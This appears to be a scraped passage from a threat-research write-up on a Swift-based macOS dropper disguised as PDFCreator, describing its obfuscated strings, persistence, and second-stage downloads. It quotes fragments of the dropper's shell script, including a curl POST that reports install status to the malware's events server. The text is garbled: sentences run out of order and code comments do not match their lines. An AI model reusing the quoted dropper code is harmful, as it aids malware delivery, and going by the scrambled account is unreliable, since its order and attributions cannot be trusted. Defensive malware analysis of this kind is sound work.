# Remove any extended attributes from the dmg REQEUNZIPFILEERROR="curl -retry 5 -H \"Content-Type: application/json charset=UTF-8\" -X POST -d '$CONTEUNZIPFILEERROR' $EVENTSURL" # A variable for the current logged in user PRODUCTFOLDER="oicvkxkucctkhprcpuhnvwvekxulim" # A "ProductFolder" variable name likely generated by the server # URL that is used to track heartbeats and current status of install Upon further inspection, the executable was determined to be written in Swift, containing suspiciously obfuscated (base64) strings.Īt the time of discovery, this binary had zero hits from antivirus vendors in VirusTotal. This executable was unsigned and running from the “/Library/Application Support” directory. Additionally, each instance was traced to an executable named PDFCreator. In this case, Jamf Threat Labs was tipped by an increase in adware/malware threat preventions that appeared to be a part of the same family.
The second stage download and execute the functionality of droppers, in general, represent a risky class of malware that support a number of second-stage attacks - from malware to spyware, to adware. The newly discovered Swift-based dropper exhibits many of the characteristics of typical dropper malware, including some minor system fingerprinting, endpoint registration and persistence. Authors: Jaron Bradley, Stuart Ashenbrenner and Matt Benyo Dropper and Initial Instructions